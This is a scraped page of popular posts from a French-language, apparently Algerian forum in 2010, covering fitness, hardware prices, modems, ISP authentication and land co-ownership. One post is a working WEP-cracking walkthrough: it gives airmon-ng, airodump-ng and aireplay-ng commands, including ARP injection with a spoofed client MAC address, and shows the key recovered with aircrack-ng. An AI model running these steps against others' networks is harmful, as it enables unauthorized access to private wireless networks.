Classement
Contenu populaire
Affichage du contenu avec la meilleure réputation le 28/08/2010 dans toutes les zones
-
salut , généralement les compléments alimentaires sont fait pour gagner en masse et volume ... avec tes 95 kilo pour 1M80 je pense que t'as pas de problème de ce coté ! , cependant sa dépendra de ton objectif , avoir un corps athlétique, bien sèche , imposant ou fort.... car contrairement a ce que l'on pourrait pensait il existe 5 genre d'entrainement 1- entrainement de Masse (gagner en muscle et en volume) 2- # de Force ( devenir + fort > Soulevé + de charge) 3 - # d'endurance (pour la sèche > perdre en graisse et gagner en endurance) 4- # de puissance (couple la force et la vitesse : utilisé dans les sport de contacte ... boxe , kick....) 5- # découpage (pour une sèche extrême , bien strier et découpé son physique + développe l'endurance) je peux t'aidai et t'orientai mais dis moi quel est ton objectif3 points
-
de new york a san francisco cette video reproduit en moins de 2 mn l'itinéraire d'un voyageur marchant de new york a san francisco un travail qui vaut bien son clic http://www.youtube.com/watch?v=lzRKEv6cHuk voici l'itinéraire sur google map lol pour les curieux http://bit.ly/brNULW2 points
-
bonjour tlm je lance ce topic a savoir s'il sera accpter par les admin voila je commence par ce spot qui represente une campagne qui prend le parti de ne pas effrayer , mais toucher la corde sensible du public http://www.embracethis.co.uk/1 point
-
1 point
-
1 point
-
Voila la liste des prix du magazin matos http://www.megaupload.com/?d=Y05GKLXE (celle des ordinateurs poratble) http://www.megaupload.com/?d=1B1SEXNT(pour tout les autres composants),bon chance1 point
-
Essayes cette boite spécialisée dans la réparation de portables, ils ont mis une aanonce sur ouedkinss ICI1 point
-
1 point
-
3.10 est un firm pour les hg520b je pense pas que tu pourra mettre celui du hg520s mais tu peux essayé si ça passe pas le modem te dira wrong firmware le firmware dans l'autre sujet est un firm modifier par serbia telecom et le 3.10 est un firm modifier par algeria teletoon à toi de voir ^^ mais une chose est certaine le hg520 est très mauvais surtout coté wifi ...1 point
-
1 point
-
1 point
-
C'est une assez longue procédure. Il faut se renseigner sur le nombre d'héritiers ou de personnes dans cette indivision et surtout leur bonne foi et leur volonté de partager et de participer surtout aux frais qui en découlent. Sinon le notaire ne peut rien à cette étape " l'acquisition". Il faut acheter et commencer à courir soit que les héritiers ou le vendeur entame cette procédure mais cela m'étonnerait, s'ils ne l'ont pas fait c'est qu'ils ne se soucient que du gain, pour eux c'est leur terrain généralement acquit par voie d'héritage. Pour quitter l'indivision, il y a deux voies : La première administrative et qui consiste à demander un permis de lotir à l'APC qui l'adresse à la direction de l'urbanisme mais qui doit recevoir l'approbation d'un tas d'organismes tels la protection civile car il faut que le lotissement ait toutes les commodités et servitudes. (accès, chemins de 06 mètres, trottoirs, assainissement, eau, gaz etc...). C'est trop long mais le problème de l'indivision est ainsi définitivement réglé et chacun récupère son acte de propriété de sa propre parcelle. La seconde procédure est judiciaire c'est la plus avantageuse et peut être plus rapide avec moins de tracasseries que la première. On s'adresse au tribunal pour demander de sortir de l'indivision, le juge désigne un expert géomètre qui va sur place et dresser la situation des lieux avec les limites de chacun et le juge rend son jugement. Une fois ce jugement en poche, c'est au notaire de vous établir votre acte de propriété individuel.1 point
-
ya http://www.laoufi.com (mais je crois qu'il est a oran )1 point
-
ça sera handicapant pour le client, en cas de changement de modem, il sera obligé de faire appel au FAI. D'autres parametres sont pris en compte pour identifier le client, tels que son port au niveau du DSLAM, l'IP du DSLAM et son username. Ces info sont stockées lors de sa toute premiere connexion et de ce fait, si ce meme username est reçu avec un autre port/IP DSLAM, l'authentification de ce client sera refusée.1 point
-
A mon avis, la Asus GTX 460 768mo (basique) serait entre 27000 da et 29000 da, c'est juste une estimation1 point
-
http://matos-algerie.com (si les prix mlah je te garanti rien ^^)1 point
-
1 point
-
avant tous j’espère que cette fois mon sujet ne disparaîtra pas pour je ne sais quelle raison. et si il est supprimé sous prétexte que c'est pas légale de parlé de sa ou bien qu'il faut pas divulgué ce genre d'informations je vous pris de supprimé le forum sécurité informatique c'est mieux vous y gagnerais en espace et en temps A tester seulement dans votre réseau local - Scénario: -Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté logiciels requis: 1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté 2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA 3-un *****er pour pouvoir déchiffré la clé wep je vous conseille la suite Aire.*****-ng qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, air*****-ng, airmon-ng] ou bien vous pouvez Utilisé la distribution BackTrack,(en live cd ou avec une clé usb) Backtrack contient tous ce qu'il faut pour ce tutoriel NB: je précise que j'utilise un système d'exploitation "Linux" Notation: MAC: adresse mac de ma carte wi-fi BSSID : adresse MAC du point d'accée ESSID: nom du point d'accès Channel: le canal du point d'accès ( de 1 jusqu'à 12) Un peut de théorie: le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP). La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités. pour les failles on peut cité: - le cryptage RC4 présente des faiblesses. - La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications. - De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits. Pour pouvoir cr@cké cette clé WEP on vas: 1-sniffer le réseau pour voir les points d'acceé 2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session 3-kr@cké les clé de session pour avoir la clé Pratique: 1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng": [le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous] [root@darkstar ]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11bg Mode:Managed Frequency:2.462 Retry min limit:7 RTS thr:of Fragment thr=2352 Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed [root@darkstar# airmon-ng start wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle on peut vérifier avec iwconfig [root@darkstar dragoun]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz RTS thr:off Power Management:ofLink Quality:0 Signal level:0 Noise level:0 2-Sniffer le réseau et détecté les points d'accès et les clients: [root@darkstar dragoun]# airodump-ng mon0 qui me renvoi ce résultat 1: BSSID => adresse MAC du point d'accée 2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP 3: ENC => type de cryptage [ dans ce cas WEP] 4: ESSID => Nom du point d'accé 5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès -j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante : [root@darkstar ]# airodump-ng -w /home/*****/*****-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0 -w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par air*****-ng âpre) -c 1 : sniffé sur le canal 1 -b: sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP) mon0: interface a utilisé ce qui renvoi le résultat suivant on remarque qu'on 1e minute on a récupéré 2077 #DATA pour cr@cké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits 3- Injecter des paquet: afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client) [root@darkstar ]# aireplay-ng -3 -e SpeedTouch345B2D -a 00:90:D0:DC:B1:E2 -h 00:19:7E:01:A3:70 mon0 - 3: pour dire qu'il faut injecter des pâques ARP - e : nom du point d'accés - a : adresse MAC du point d'accès - h: adresse MAC du client (pour faire croire que les pâques viennent de lui) mon0: interface wi-fi - Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui suffit même pour une clé 128 bits 4- cr@cké les paquets: on récupéré le fichier enregistré avec airodump-ng et on en le ***** avec air*****-ng [root@darkstar ]# air*****-ng /home/*****/*****-wep-01.cap -b 00:90:D0:DC:B1:E2 *****-wep-01.cap: fichier sur le quelle on a sauvegardé lespâques avec airodump-ng -b: adresse de AP KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1" + EDIT CONTENU HORS CHARTE [/color]1 point
-
Je confirme avec une petite précision, c’est que la première ligne qui utilise les identifiants pour la première fois, seront enregistrés pour cette ligne rien d’autre, meme si la ligne n’est pas la propriétaire d’origine.1 point
-
bonjour, je viens de revenir de chez eux, c'est revenu dans l'ordre , d'après le chef de service technique de setif, ces perturbation sont relier au déploiement du réseau MSAN a Alger, Tizi et Bejaia villes pilotes.1 point
-
1 point
-
et oui,malheureusement y a des gens machi hamdine rabi , qui se plaignent tout le temps (karhine hyathoum !) mais de quoi ? du ping ! du débit rahou tla3 raho hbat !1 point